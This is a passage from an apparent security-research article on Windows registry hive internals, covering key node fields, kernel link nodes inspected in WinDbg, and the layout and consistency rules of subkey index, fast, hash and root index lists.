    There is also an additional, implicit state called Merge-Unbacked, used to describe keys that don't exist in a hive at a given level, and so they simply fall through to the state represented by keys in the lower layers. Overall, layer semantics play a crucial role in the functionality of layered keys and differencing hives, and their correct handling in the registry implementation is paramount to system security and stability. Unfortunately, the feature is too complex to thoroughly discuss here, but there are some excellent resources on the subject: Microsoft's Containerized Configuration (US20170279678A1) patent, Maxim Suhanov's Containerized registry hives in Windows blog post, and the "Registry virtualization" section in Chapter 10 of the Windows Internals 7 (Part 2) book.

    InheritClass

    This bit is also related to layered keys, and it indicates whether the key inherits the class value from its counterparts lower in the key stack, or defines its own (or lack thereof).

    Parent

    The field identifies the key node that acts as this key's parent within the registry's hierarchical structure. Except for root keys, which exist at the topmost level of a hive, every key must have a valid Parent field. This index plays a vital role in navigating the registry and modifying key relationships. For example, it's essential for determining a key's full path or ensuring correct alphabetical order when renaming a key within its parent's subkey list.

    SubKeyCounts

    This two-element array of DWORDs stores the number of the key's stable and volatile subkeys, respectively. Even though the integers are 32 bits wide, the actual number of subkeys is limited by the upper bound of all keys in a hive in a specific storage space, which is roughly 2 GiB (storage space size) ÷ 84 bytes (minimum key node size) ≈ 25.5 million keys.

    The data in this field is somewhat redundant, as the same information is also stored in the subkey indexes themselves. Nevertheless, the cached numbers stored directly in the key node make it possible to efficiently query the numbers of subkeys with API such as RegQueryInfoKey. The kernel does its best to keep the two copies of the information in sync, and any discrepancies between them may lead to memory corruption vulnerabilities.

    SubKeyLists

    This is another two-element array, which complements the previous SubKeyCounts member by providing cell indexes to the corresponding subkey lists for each storage type. The format of these lists is discussed in detail in the "Subkey indexes" section below; for now, it's only important to know that if SubKeyCounts[x] > 0, then SubKeyLists[x] is expected to be a valid cell index, otherwise it should be equal to HCELL_NIL (-1). Furthermore, because the volatile space is a strictly in-memory concept that doesn't exist on disk, newly loaded hives are always expected to have SubKeyCounts[1] set to 0 and SubKeyLists[1] set to HCELL_NIL.

    ValueList

    This is a structure of type _CHILD_LIST, which consists of two 32-bit integers: the number of values associated with the key, and a cell index of the actual value list. Here, there is no distinction between stable and volatile values: for any given key, the values always inherit the storage type of the key, so either all of them are stable, or all of them are volatile. Similarly to subkey lists, though, if ValueList.Count is 0, then ValueList.List must be HCELL_NIL.

    As mentioned earlier, this field also had a second meaning if the key was a predefined key: in that case, ValueList.Count contained an arbitrary value with the highest bit set, which indicated the top-level HKEY to redirect to, and ValueList.List was completely unused and could contain arbitrary data. As you can imagine, whenever an internal system function started to use such a value list with the assumption it was a normal key, it would operate on an inadequately huge count and an invalid cell index, wrecking havoc in the kernel. Thankfully, this is no longer a possibility due to the deprecation of predefined keys in 2023.

    ChildHiveReference

    You may have noticed that ChildHiveReference is part of a union, as it resides at the same offset as the SubKeyLists member (offset 0x1C). It is a special object that is used to implement hive mounting under the \Registry tree, and is unique to keys that have the KEY_HIVE_EXIT flag set (i.e. exit nodes). It is only ever used in memory, and is therefore not applicable to regular hives stored on disk. Its two fields specify the root key of the mounted hive, as a pair of a kernel pointer to the _HHIVE descriptor structure and the cell index of the root key. This breaks the fundamental invariant that hives are self contained and don't store any virtual address pointers, only cell indexes. It is the only exception to the rule, and only because it is a necessary hack/workaround to implement a feature that hives normally don't support: attaching one hive to another in the global system view.

    The field and its usage are discussed in more detail in the "Link nodes" section below.

    Security

    This is the cell index of the security descriptor cell corresponding to the key. It is a mandatory field for every type of key in the registry (symbolic links, previously predefined keys etc.), with the only exception being system-managed exit nodes. For every key that has an invalid security descriptor during hive load (e.g. set to HCELL_NIL or just an invalid cell index), it is automatically fixed up to inherit the security descriptor of its parent key. If the root key of a hive has invalid security, the whole hive is rejected with the STATUS_REGISTRY_CORRUPT error code.

    The security descriptor cell always has the same storage type as the key(s) that it is associated with. So for example, if there are two keys in a hive with the same security properties, one in the stable and the other in the volatile space, then they will reference two different stable/volatile security cells with equivalent data.

    For obvious reasons, the correct handling of this field is crucial to overall system security. In the course of my research, I have discovered 9 vulnerabilities directly involving the handling of security descriptors, and a further 4 reported to Microsoft outside of the tracker (WinRegLowSeverityBugs #1, #10, #13, #20). They generally didn't have much to do with the  _CM_KEY_NODE.Security field specifically, but rather the formatting of the security cells and higher-level logic related to them:

    • Binary formatting of the SECURITY_DESCRIPTOR_RELATIVE structure
    • Maintaining the consistency of the doubly-linked list of security descriptors in the hive
    • Reference counting security descriptors when operating on keys
    • Enforcing proper access checks when opening and creating keys

    Overall, this is probably the most interesting field in the structure from a security research perspective.

    Class and ClassLength

    In technical terms, a key class is an optional, immutable blob of 1-65535 bytes associated with a key. It can only be set once, during the creation of a key, through the lpClass argument of the RegCreateKeyExW API (or the equivalent Class parameter of the NtCreateKey system call). It can be then queried with functions such as RegQueryInfoKey, but cannot be modified without deleting and re-creating the key. If the class exists, then the ClassLength field is set accordingly, and Class is a cell index that points to its backing buffer. Otherwise, ClassLength is set to 0 and Class is HCELL_NIL (-1).

    Conceptually, a class can be viewed as an extra, hidden value of a key, existing alongside the normal value list. It is not displayed anywhere in the Regedit GUI, but if it exists for a given key, it can be retrieved by using the "Export" option in Regedit to save the key to a .txt file, which also exports the class data. It has existed since the earliest version 1.0 of the regf format – perhaps as a way to store the "type" of a key similar to how every value has a defined type. Today, it seems to be a mostly obsolete mechanism that doesn't see much use; even Raymond Chen wrote in his What is the terminology for describing the various parts of the registry? blog in 2009:

    Bonus chatter: There’s also this thing called a class. I have no idea what it’s for, so don’t ask.

    When I ran a quick scan of the Windows 11 registry, I found the following unique strings being used at least once as a key class:

    • "DynDRootClass"
    • "GenericClass"
    • "Network ComputerName"
    • "REG_SZ"
    • "Shell"

    The Windows NT Registry File (REGF) format specification lists several other values that have been observed in the past, such as "activeds.dll ", "Cygwin", "OS2SS" or "TCPMon". It is worth noting that the class was also used to store the encryption keys for the now-deprecated SAM database encryption mechanism known as SysKey. Overall, due to its simplistic nature, key classes are not particularly security-relevant, but may be of interest in the context of obfuscation and hiding data, as they are easily accessible and yet a largely overlooked part of the registry.

    MaxNameLen, MaxClassLen, MaxValueNameLen and MaxValueDataLen

    These four fields store cached information about the maximum lengths of several properties of the key or its subkeys:

    • MaxNameLen: the maximum length of a subkey's name,
    • MaxClassLen: the maximum length of a subkey's class information,
    • MaxValueNameLen: the maximum length of a value name associated with the key,
    • MaxValueDataLen: the maximum length of a value data associated with the key.

    The presumed purpose of these members is to facilitate a quick lookup of the per-key limits, such that when a client application wants to enumerate/query subkeys or values, it can simply allocate a single buffer guaranteed to accommodate every possible key name, value name, etc. And so, their exact values can be retrieved with the RegQueryInfoKey API via the lpcbMaxSubKeyLen, lpcbMaxClassLen, lpcbMaxValueNameLen and lpcbMaxValueLen arguments.

    Although querying these limits seems convenient, there are some caveats that are important to keep in mind:

    • The fields are intended to represent the lower bound of the number of bytes required to store the given property, but not necessarily to be optimal (i.e. to be the smallest sufficient length). For example, when a key with formerly the longest name is deleted, the MaxNameLen field of the parent is not updated with the value of the second-largest length, as that would require the lengthy process of iterating through all of the subkeys again. Therefore, relying on those values may incur some unwanted memory overhead.
    • When operating on registry keys that are globally visible in the registry tree, it is possible that a race condition with another application causes one of the maxima to change in between the RegQueryInfoKey call and the actual data query. To address this, applications should include fallback logic to allocate more memory in the rare case when the obtained maximum proves insufficient.
    • To add to the previous point, after having reverse-engineered and reviewed most of the Configuration Manager code, it is my instinct that these fields continue to be supported throughout the development of new registry features (e.g. differencing hives), but it is mostly on a best-effort basis. For example, during hive load, only MaxValueNameLen and MaxValueDataLen are enforced to have the correct values, while MaxNameLen and MaxClassLen remain unchecked. For this reason, I would personally not rely on the consistency of those values for the security of any client code, and would treat them more as a guidance/supplementary information than the sole source of truth about the key limits.
    UserFlags

    This is a field whose name, offset and function (so basically every aspect) has been subject to change over the years. Its current form has existed since Windows Vista, and occupies bits 20-23 of MaxNameLen, which had been previously a 32-bit integer, but was later reduced to 16 bits to make room for these extra flags. In theory, its name may suggest that this member is meant to store user-defined data, but in practice, Microsoft developers quickly found their own use for the bitmask: storing flags related to the Registry Reflection mechanism for providing interoperability between 32-bit and 64-bit applications. You can read more about the meaning of each specific flag here, but in short, this was where reflection-specific configuration was internally saved by API functions such as RegEnableReflectionKey and RegDisableReflectionKey, and retrieved by RegQueryReflectionKey.

    However, this specific use seems to have been short-lived, as Registry Reflection was soon deprecated in Windows 7. Since then, it could indeed be considered as four extra bits of user-controlled storage per key, accessible for reading via NtQueryKey(KeyFlagsInformation) and for writing via NtSetInformationKey(KeyWow64FlagsInformation). Beyond being interesting for historical reasons, the field doesn't play any important role in security.

    VirtControlFlags

    This field is another one introduced around Windows XP SP3 / Windows Vista that took over some of the space from MaxNameLen. It is related to Registry Virtualization and takes up four bits in the _CM_KEY_NODE structure definition, but there are only three flags that it can really store:

    Mask

    Name

    Description

    0x1

    REG_KEY_DONT_VIRTUALIZE

    Disables virtualization for the specific key.

    0x2

    REG_KEY_DONT_SILENT_FAIL

    Prevents the system from re-opening a virtualized key with MAXIMUM_ACCESS if the initial Open operation with the desired access rights has failed.

    0x4

    REG_KEY_RECURSE_FLAG

    Causes new subkeys of the key to inherit its virtualization-related configuration.

    The flags are not sanitized in any way during hive load and so may be set to arbitrary values. They can also be modified programmatically by using the NtSetInformationKey(KeyControlFlagsInformation) system call, or even from the Windows command line, by using the REG FLAGS command:

    C:\>reg flags /?

    REG FLAGS KeyName [QUERY |

                       SET [DONT_VIRTUALIZE] [DONT_SILENT_FAIL] [RECURSE_FLAG]]

                      [/reg:32 | /reg:64]

      Keyname    "HKLM\Software"[\SubKey] (Restricted to these keys on

            local machine only).

        SubKey   The full name of a registry key under HKLM\Software.

      DONT_VIRTUALIZE DONT_SILENT_FAIL RECURSE_FLAG

        Used with SET; flags specified on the command line will be set,

            while those not specified will be cleared.

      /reg:32  Specifies the key should be accessed using the 32-bit registry view.

      /reg:64  Specifies the key should be accessed using the 64-bit registry view.


    More information about these flags can be found in the documentation of the ORSetVirtualFlags API function, a part of the Offline Registry Library. In the context of registry security research, I haven't found them particularly interesting – the other virtualization-related flags in the "Flags" field have proved to be much more useful in that regard.

    Debug

    In Debug/Checked builds of Windows, it used to be possible to have the kernel trigger a breakpoint when performing a specific operation on a specific registry key. To enable the option, an administrator would have to set the  HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager\RegDebugBreaksEnabled value to 1, which would propagate to the global kernel CmpRegDebugBreakEnabled variable. Then, the "Debug" field of each key would store a bitmask indicating which subset of eight possible operations should be interrupted for the given key:

    Mask

    Name

    0x01

    BREAK_ON_OPEN

    0x02

    BREAK_ON_DELETE

    0x04

    BREAK_ON_SECURITY_CHANGE

    0x08

    BREAK_ON_CREATE_SUBKEY

    0x10

    BREAK_ON_DELETE_SUBKEY

    0x20

    BREAK_ON_SET_VALUE

    0x40

    BREAK_ON_DELETE_VALUE

    0x80

    BREAK_ON_KEY_VIRTUALIZE

    Whenever a breakpoint was triggered by this mechanism, the kernel would also print out a corresponding message for the attached debugger, for instance:

    DbgPrint("\n\n Current process is deleting a key tagged as BREAK ON DELETE");

    DbgPrint(" or deleting a subkey under a key tagged as BREAK_ON_DELETE_SUBKEY\n");

    DbgPrint("\nPlease type the following in the debugger window: !reg kcb %p\n\n\n", Kcb);


    Now that the Debug/Checked builds have been discontinued – or at least not released publicly anymore for the latest versions of Windows 10/11 – the "Debug" field is just an unused byte in the key node structure.

    WorkVar

    According to an unofficial format specification, WorkVar used to be an internal-use member meant to be only ever accessed by the kernel in order to optimize key lookups. The last version of Windows where WorkVar was still in active use was Windows 2000; since Windows XP, it has simply been another four bytes of unused memory in the key node data layout.

    NameLength and Name

    The combination of these two fields specifies the name of the key: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer at the end of the structure that stores the name itself. There are a number of considerations and consistency requirements related to registry key names, enforced when loading a hive and later at runtime:

    • Compression: If the KEY_COMP_NAME (0x20) flag is clear in _CM_KEY_NODE.Flags, the name is formatted as a wide string of 16-bit characters. If it is set, which is the common scenario, then "Name" represents a more tightly packed ASCII string of 8-bit characters. Considering that a majority of keys in the registry are alphanumeric, this optimization saves a non-trivial amount of memory and disk space. It is interesting to note that it is still possible to load a hive with a non-optimally formatted key name (non-compressed ASCII string), but such a key node would never be generated by Windows itself.
    • Length: The key name mustn't be empty (i.e. it should be at least one character long), and it cannot exceed 256 characters in length (even though Registry element size limits incorrectly claims that the limit is 255). The NameLength field value is expressed in bytes, so it must be between 1-256 for compressed names, and 2-512 for wide strings (and divisible by two). Up until October 2022, this limit was not correctly enforced, making it possible to load hives with key names up to 1040 characters, which would then be mishandled or outright rejected by other parts of the registry code.
    • Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a key name with the exception of backslash ('\', 0x005C). The backslash is singled out because it plays a special role in the registry, separating distinct elements of the registry paths. Since the kernel must always be able to distinguish parts of key names from the separator, a decision was made to exclude this one character from the key name charset, similar to how backslashes are not allowed in file names. Furthermore, there is a second minor requirement that the key name must not start with a null character, but it may be present at any other position in the name (this only started to be properly enforced in NtRenameKey after the fix for CVE-2024-26178 in March 2024). Overall, this means that key names aren't truly textual strings in the conventional sense of the word: they don't use a terminator, and may contain all sorts of non-printable characters. It would be more appropriate to think of them as binary blobs used to reference registry keys, which doesn't have any consequences for the kernel, as it universally uses the UNICODE_STRING structure that includes both the length and the backing buffer of the string anyway. But if a potentially malicious program were to create a key with an unusual name (e.g. including a null character), it could prove difficult for an administrator to operate on it with the built-in registry utilities (reg.exe, Regedit), or even with third-party tools that use the high-level API (such as RegOpenKeyEx). In such cases, it might be required to use specialized tools that interact with the Windows registry directly through the system call interface as the only way to examine/modify such keys.
    • Uniqueness: One of the most important invariants of the Windows registry implementation is the uniqueness of key names: there may be only one key with a specific path, or in other words, for every key, there mustn't be any duplicates in the list of its subkeys. Given that registry key names are case-insensitive, any two names are always compared in their uppercase form to determine if they are equal or not. This uniqueness requirement is enforced both during hive load and subsequent operations, and failure to do it correctly could lead to both logic bugs and memory corruption. For some examples of the potential outcomes of allowing duplicate key names in registry, see Maxim Suhanov's The uppercased hell blog or my CVE-2023-21748 / CVE-2023-23420 bug reports.

    Another intriguing aspect of the key names are the names associated with the root keys of default system hives. In general, every registry key in Windows is referenced by its name specified in the key node, except for root keys, which are known by the name of their mount points. As a result, the "real" underlying names of root keys are never visible to users or applications, but they are nevertheless present in the hive file as a mandatory part of every key node, and could be potentially used to learn something about how these fundamental system hives (SOFTWARE, SYSTEM etc.) are generated.

    I have examined hives from various Windows versions ranging from Windows NT 3.1 to Windows 11, and arrived at the following list of per-version root key names:

    Version

    Root key name

    NT 3.1 - NT 4.0

    Same as the hive name (e.g., "SYSTEM")

    2000 - XP

    $$$PROTO.HIV

    Vista - 7

    CMI-CreateHive{RANDOM GUID}

    8

    CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000}

    10 - 11

    ROOT

    In early NT versions, the root key name simply mirrored the hive's file name. In Windows 2000 and XP, the name stemmed from the fact that system hives were created during system installation by temporarily creating the tree root under \Registry\Machine\SYSTEM\$$$PROTO.HIV, pre-initializing it with the default data for the given hive, and saving it to a file with an API like RegSaveKeyEx.

    In Windows 10 and 11, the name is simply "ROOT", which, along with the "OfRg" magic bytes at offset 0xB0 in the file header, hints that the hives are created with the Offline Registry Library. This leaves versions between Windows Vista and Windows 8 as the big unknown: neither "CMI-CreateHive" nor "CsiTool-CreateHive" sound particularly familiar, and I haven't been able to find any information about them in any public resources. It is probably safe to assume that these strings are indicative of some internal Microsoft tooling that was used to generate hives for these systems, but not much is known beyond it. Nevertheless, I find it fascinating that such little tidbits of information can be found in obscure corners of file formats. You never know when some other missing part of the puzzle becomes known publicly, making it possible to finally connect the dots and see the bigger picture, sometimes years or decades after the initial release of the software.

    Link nodes

    As mentioned above, link nodes are a special type of key node designed to facilitate the mounting of arbitrary hives from disk into the global registry view. They are managed by the Windows kernel and only ever exist in memory. They are represented by the _CM_KEY_NODE structure, but with the following differences compared to regular keys:

    • The Signature field is set to 0x6B6C ('lk') instead of 0x6B6E ('nk'),
    • The KEY_HIVE_EXIT (0x0002) flag is set in Flags,
    • The key doesn't have any of the standard key properties, such as the security descriptor, class, subkeys or values. The only cell reference it contains is to its parent cell, which is one of \Registry\A, \Registry\Machine, \Registry\User or \Registry\WC.
    • Instead of the SubKeyLists member at offset 0x1C, the link node uses the ChildHiveReference field of type _CM_KEY_REFERENCE, which stores a kernel-mode pointer to the destination hive descriptor (_HHIVE*), and the cell index of the root key within that hive.

    So, whenever you see a hive root key (e.g. any key within HKLM or HKCU), you are actually looking at a pair of a link node (also known as exit node) + root key (a.k.a. entry node – these terms are used interchangeably). The mount point assumes the key name of the link node (so that it is easily enumerable with the existing kernel logic), and all of the characteristics of the entry node. This is illustrated in the following diagram, where the key marked in red is the link node of the SYSTEM hive, and the green one is the root key:

    Diagrammatic illustration and visual representation of the paragraph above

    The existence of link nodes seems to be very little known and scarcely documented in public resources, which is likely caused by the fact that the Windows kernel makes them virtually invisible, and not just for users and high-level API clients, but even for administrators and kernel driver developers. The way the registry tree traversing code is structured, whenever it encounters a link node, it always makes sure to skip over it and reference the corresponding entry node. This means that it is impossible to open or otherwise observe the link node itself from the context of user-mode, but if we put in some effort, we should be able to see it in WinDbg attached as a kernel debugger. We can approach the link node from two sides: either try to find it top-down starting from the master hive, or by locating a key in a mounted hive and traversing the registry tree upwards.

    In this post, we will proceed with the first idea and enumerate the keys within \Registry\Machine (i.e. HKLM):

    0: kd> !reg querykey \registry\machine

    Found KCB = ffff800f88ad96e0 :: \REGISTRY\MACHINE

    Hive         ffff800f88a88000

    KeyNode      ffff800f88ada16c

    [SubKeyAddr]         [SubKeyName]

    ffff800f88ada44c     BCD00000000

    ffff800f88ada3cc     HARDWARE

    ffff800f88ada59c     SAM

    ffff800f88ada504     SECURITY

    ffff800f88ada374     SOFTWARE

    ffff800f88ada31c     SYSTEM

     Use '!reg keyinfo ffff800f88a88000 <SubKeyAddr>' to dump the subkey details

    [ValueType]         [ValueName]                   [ValueData]

    REG_DWORD           ServiceLastKnownStatus        2


    Here, we can see all the system hive mount points together with their corresponding link node addresses. In case of normal, stable keys, these would be user-mode addresses within the address space of the Registry process, but since the master hive is a volatile one, all of its structures are stored on the kernel pools. We can then use a command such as !reg knode to query any of the specific subkeys, e.g. SYSTEM:

    0: kd> !reg knode ffff800f88ada31c

    Signature: CM_LINK_NODE_SIGNATURE (kl)

    Name                 : SYSTEM

    ParentCell           : 0x168

    Security             : 0xffffffff [cell index]

    Class                : 0xffffffff [cell index]

    Flags                : 0x2a

    MaxNameLen           : 0x0

    MaxClassLen          : 0x0

    MaxValueNameLen      : 0x0

    MaxValueDataLen      : 0x0

    LastWriteTime        : 0x 1db2b94:0xe031a530

    SubKeyCount[Stable  ]: 0x0

    SubKeyLists[Stable  ]: 0x20

    SubKeyCount[Volatile]: 0x0

    SubKeyLists[Volatile]: 0xffffffff

    ValueList.Count      : 0x88a8e000

    ValueList.List       : 0xffff800f


    As expected, the key node has the special link node signature ('kl'), and the 0x2 flag set within the 0x2a Flags bitmask (the other two flags set are KEY_NO_DELETE and KEY_COMP_NAME). The command gets a little confused, because it expects to operate on a regular key node and display its subkey/value counts and lists, but as mentioned above, this space is taken up by the _CM_KEY_REFERENCE structure in the link node. If we line up the offsets correctly, we can decode that the exit node points at cell index 0x20 in hive 0xffff800f88a8e000, which is consistent with the outcome of displaying the structure data directly:

    0: kd> dx -id 0,0,ffffbd044acf6040 -r1 (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))

    (*((ntkrnlmp!_CM_KEY_REFERENCE *)0xffff800f88ada338))                 [Type: _CM_KEY_REFERENCE]

        [+0x000] KeyCell          : 0x20 [Type: unsigned long]

        [+0x008] KeyHive          : 0xffff800f88a8e000 [Type: _HHIVE *]


    We can now translate this information into the cell's virtual address, and take a peek into it with !reg knode and !reg keyinfo:

    0: kd> !reg cellindex 0xffff800f88a8e000 0x20

    Map = ffff800f88adc000 Type = 0 Table = 0 Block = 0 Offset = 20

    MapTable     = ffff800f88ade000 

    MapEntry     = ffff800f88ade000 

    BinAddress = ffff800f896e8009, BlockOffset = 0000000000000000

    BlockAddress = ffff800f896e8000 

    pcell:  ffff800f896e8024

    0: kd> !reg knode ffff800f896e8024

    Signature: CM_KEY_NODE_SIGNATURE (kn)

    Name                 : ROOT

    ParentCell           : 0x318

    Security             : 0x78 [cell index]

    Class                : 0xffffffff [cell index]

    Flags                : 0x2c

    MaxNameLen           : 0x26

    MaxClassLen          : 0x0

    MaxValueNameLen      : 0x0

    MaxValueDataLen      : 0x0

    LastWriteTime        : 0x 1db2b94:0xe031a530

    0: kd> !reg keyinfo 0xffff800f88a8e000 ffff800f896e8024

    KeyPath         \REGISTRY\MACHINE\SYSTEM

    [SubKeyAddr]         [SubKeyName]

    ffff800f896e8174     ActivationBroker

    ffff800f896e964c     ControlSet001

    ffff800f89f0e8a4     DriverDatabase

    ffff800f89f999c4     HardwareConfig

    ffff800f89f9a314     Input

    ffff800f89f9a3dc     Keyboard Layout

    ffff800f89f9a43c     Maps

    ffff800f89f9a674     MountedDevices

    ffff800f89f9ab64     ResourceManager

    ffff800f89f9abc4     ResourcePolicyStore

    ffff800f89f9ac2c     RNG

    ffff800f89f9addc     Select

    ffff800f89f9aed4     Setup

    ffff800f89f9b7d4     Software

    ffff800f89f9d1f4     State

    ffff800f89f9d24c     WaaS

    ffff800f89fabc8c     WPA

    [SubKeyAddr]         [VolatileSubKeyName]

    ffff800f88b91024     CurrentControlSet

     Use '!reg keyinfo ffff800f88a8e000 <SubKeyAddr>' to dump the subkey details

    [ValueType]         [ValueName]                   [ValueData]

     Key has no Values


    We have indeed ended up at the root key of the SYSTEM hive, which has a standard key node signature ('nk'), the predefined "ROOT" name, a valid security descriptor, a list of subkeys, and so on.

    Overall, link nodes are an interesting implementation detail of the registry that are worth keeping in mind. However, considering their relative simplicity and the fact that they are hidden away even from very low-level mechanisms like Registry Callbacks, they are of limited significance to system security. The lone vulnerability I found related to them, CVE-2023-21747, resulted in a use-after-free due to improper cleanup of the exit node when faced with an out-of-memory condition.

    Subkey indexes

    Operations performed on subkey lists are some of the most common ones – they are involved whenever a key is opened, created, deleted, renamed or enumerated, which constitutes a majority of actions involving the registry at runtime. It is for this reason that subkey lists have seen the most evolution throughout the subsequent versions of the regf format. As the interface was getting adopted by more and more applications in Windows NT and later systems, Microsoft developers could collect data on the typical usage patterns and devise adequate optimizations to speed these operations up. In this section, we will have a deeper look into how subkey indexes are formatted in the hives, and how the different types of operations affect them.

    By way of introduction, subkey indexes are data structures storing lists of descendant keys relative to a parent key, referenced through the _CM_KEY_NODE.SubKeyLists[...] cell indexes. During hive load, the value at index 0 of the array may either be a subkey index, or HCELL_NIL if there are no subkeys; index 1 must always be equal to HCELL_NIL, as by definition there are no volatile subkeys on disk. The high-level concept behind the subkey index is that it is a linear list of key node cell indexes, which must efficiently support the following operations (from most to least commonly used, in my subjective opinion):

    1. Finding a key by name,
    2. Finding a key by index on the list,
    3. Adding a new key to the list,
    4. Deleting a key from the list.

    Regardless of the underlying representation of the list, it is always stored in a lexicographical order, reducing the lookup-by-name time from linear to logarithmic by using binary search. Let's now look into the specific structures used in registry hives to implement this functionality.

    Index leaves

    Index leaves are the most basic type of a subkey list, which has been supported since the first iteration of the regf format and consists of just three members: the signature (0x696C, 'li'), number of entries (16-bit), and an inline, variable-length list of the cell indexes. The corresponding Windows kernel structure is _CM_KEY_INDEX:

    0: kd> dt _CM_KEY_INDEX

    nt!_CM_KEY_INDEX

       +0x000 Signature        : Uint2B

       +0x002 Count            : Uint2B

       +0x004 List             : [1] Uint4B


    Given the Count field range, the index leaf can store up to 65535 subkeys. It is the most compact one in terms of disk/memory consumption, but it provides somewhat poor cache locality, because every key referenced during the lookup must be accessed in memory in order to read its name from _CM_KEY_NODE.Name. Nevertheless, index leaves are still commonly used in all versions of Windows up to this day.

    As an example, let's consider a key with five subkeys named "wombat", "🐂", "HIPPO", "ant", and "ocelot". An index leaf of such a key could look like this:

    Diagram showing a key with five subkeys, as described in the sentence preceding this image

    This illustrates that entries in the list are indeed stored in a sorted manner, and in a case-insensitive way – "ant" goes before "HIPPO" even though 'H' (0x48) < 'a' (0x61). However, this logic applies to comparisons only, and otherwise the letter casing specified during key creation is preserved and visible to registry users. Finally, the unicode ox symbol is placed last on the list, because it is encoded as U+D83D U+DC02, and 0xD83D is greater than any of the ASCII characters in the other names.

    Fast leaves

    Fast leaves are slightly younger than subkey indexes, introduced in regf version 1.3 in 1995 (Windows NT 4.0). As hive versions 1.2 and below have been long obsolete, that means that fast leaves are universally supported in every modern version of Windows at the time of this writing. As the name suggests, they are meant to be faster than their predecessors, by including up to four initial characters of each subkey in the list as a "hint" next to the cell index of the key. This allows the kernel to execute the first four iterations of the string comparison loop using data only from the fast leaf and without referring to the corresponding node, which addresses the aforementioned issue of poor cache locality in index leaves. We expect this optimization to be effective in most real-life scenarios, as most keys consist of ASCII-only characters and differ from each other within the first four symbols.

    The specific logic of generating the 32-bit hint from a string can be found in the internal CmpGenerateFastLeafHintForUnicodeString kernel function, but is boils down to the following steps:

    1. Set the initial hint variable to 0
    2. In a loop of min(4, length) iterations:
    1. If the n-th character is greater than 0xFF, break
    2. Otherwise add the character (with its original case) to the hint
    1. Return the hint to the caller

    For example, the hint for "ant" is "ant\0", the hint for "HIPPO" is "HIPP", and the hint for "🐂" is "\0\0\0\0" (the first character is non-ASCII, so the whole hint is simply zero).

    When it comes to the structure layout of the fast leaf, it is basically the same as the index leaf, but it has a different signature ('lf') and twice as many entries in the List array due to the addition of hints. There doesn't seem to be any structure definition corresponding specifically to fast leaves in the public symbols, which either means that the structure is a non-public one, or it is also accessed via _CM_KEY_INDEX in the source code, but through references such as Index.List[2*n] instead of Index.List[n]. An illustration of a fast leaf containing the five example subkeys is shown below:

    Fast Leaf diagram containing the five example subkeys

    Hash leaves

    Hash leaves are the third and last (for now) iteration of the subkey index format, introduced in Windows XP in 2001 (regf version 1.5). They have exactly the same data layout as fast leaves, but are characterized by the 'lh' signature, and the 32-bit hint is a simple hash of the entire string instead of an inline representation of the first four characters. The specific hashing algorithm is implemented in the internal CmpHashUnicodeComponent function, and can be summarized with the following steps:

    1. Start with a hash equal to 0
    2. For every character in the string:
    1. Hash = (Uppercase(Character) + 37 * Hash) % 0x100000000
    1. Return the hash to the caller

    The main benefit of this approach is that it works equally well with ASCII and non-ASCII strings, and it covers the entire name and not just a prefix, further limiting the number of necessary references to the subkey nodes during key lookup. However, you may notice that a full-string hash isn't really compatible with the concept of binary search, and indeed, whenever a hash leaf is used, the kernel performs a linear search instead of a binary one, as can be seen in the corresponding CmpFindSubKeyByHashWithStatus function. In theory, this could lead to iterating through 65535 keys (the maximum number of entries in a hash leaf), but in practice, the kernel makes sure that a hash leaf is never longer than 1012 elements. This is okay for performance, because when more subkeys are associated with a key, a second-level data structure comes into play (the root index, see the next section), and that one is always traversed with a binary search. Overall, it seems possible that the cache friendliness of the hash leaf makes up for its theoretically worse lookup complexity, especially in the average case.

    A corresponding diagram of a hash leaf data layout is shown below:

    Image showing hash leaf data layout as described above

    Root indexes

    Each key in the registry can potentially have many thousands of subkeys, but having them stored in one very long list (such as a single index, fast or hash leaf) could lead to poor performance for some operations. For example, whenever a new key is inserted into the alphabetically sorted list, the portion of the list after the new key has to be moved in memory to make room for the new item. Similar CPU-heavy situations could arise when extending the dynamically sized array in the hive, and potentially having to copy its entire contents to a new cell if the existing one doesn't have any free space behind it. In the worst case scenario, this would have a complexity of O(n) per operation, which is too slow for such an important system mechanism as the Windows registry.

    It is likely for this reason that whenever the subkey list becomes longer than 1012 elements for the first time, a second-level index called the root index is inserted into the data structure. This has the goal of splitting a single long list into several shorter ones, which are easier to manage in memory. Root indexes cannot be nested or referenced recursively by one another: a subkey list may either be non-existent, a single leaf-type list, or a single root index pointing at leaf-type lists (in other words, the list may be 0, 1 or 2 levels deep).

    The root index has existed for as long as the index leaves have: since the very first regf version 1.0 in Windows NT 3.1 Pre-Release. It also has the same layout represented by the _CM_KEY_INDEX structure, which consists of a signature ('ri' in this case), a 16-bit count and an array of cell indexes pointing at leaf-type lists, without any additional hints. An example diagram of a two-level subkey index containing five keys is shown below:

    An image showing an example diagram of a two-level subkey index containing five keys

    Fundamental subkey list consistency requirements

    There is a set of some very basic format consistency requirements concerning subkey indexes, which must be always met for any active hive in the system, regardless of whether it has been loaded from disk or created from scratch at runtime. These are the minimum set of rules for this data structure to be considered as "valid", and they are tightly connected to the memory safety guarantees of the kernel functions that operate on them. They are as follows:

    • The signature of each subkey list cell must be correctly set to its corresponding type, one of 'li', 'lf', 'lh' or 'ri'.
    • The size of the cell must be greater or equal to the number of bytes required to store all of the elements in the "List" array, according to the value of the "Count" member.
    • A subkey list cell may never be empty, i.e. _CM_KEY_INDEX.Count mustn't be zero (whenever it becomes zero, it should be freed and un-referenced in any of the other hive cells).
    • The number of subkeys cached in the key node (_CM_KEY_NODE.SubKeyCounts[x]) must be equal to the number of subkeys defined in the subkey index (i.e. the sum of _CM_KEY_INDEX.Count of its index leaves).
    • The cell indexes stored in _CM_KEY_NODE.SubKeyLists[x] must either be HCELL_NIL (if SubKeyCounts[x] is zero), or point to a root index or one of the three leaf types. Additionally, SubKeyCounts[1] must be zero and SubKeyLists[1] must be HCELL_NIL on hive load.
    • All cell indexes stored in a root index must point at valid leaf indexes.
    • All cell indexes stored in leaf indexes must point at valid key nodes.
    • All hints specified in the fast leaves and hash leaves must be consistent with the names of their corresponding keys.
    • The overall subkey list must be sorted lexicographically, i.e. the name of each n+1th subkey must be strictly greater than the name of the nth subkey. This also entails that there mustn't be any duplicates in the subkey list, neither with regards to the cell index or the subkey name.

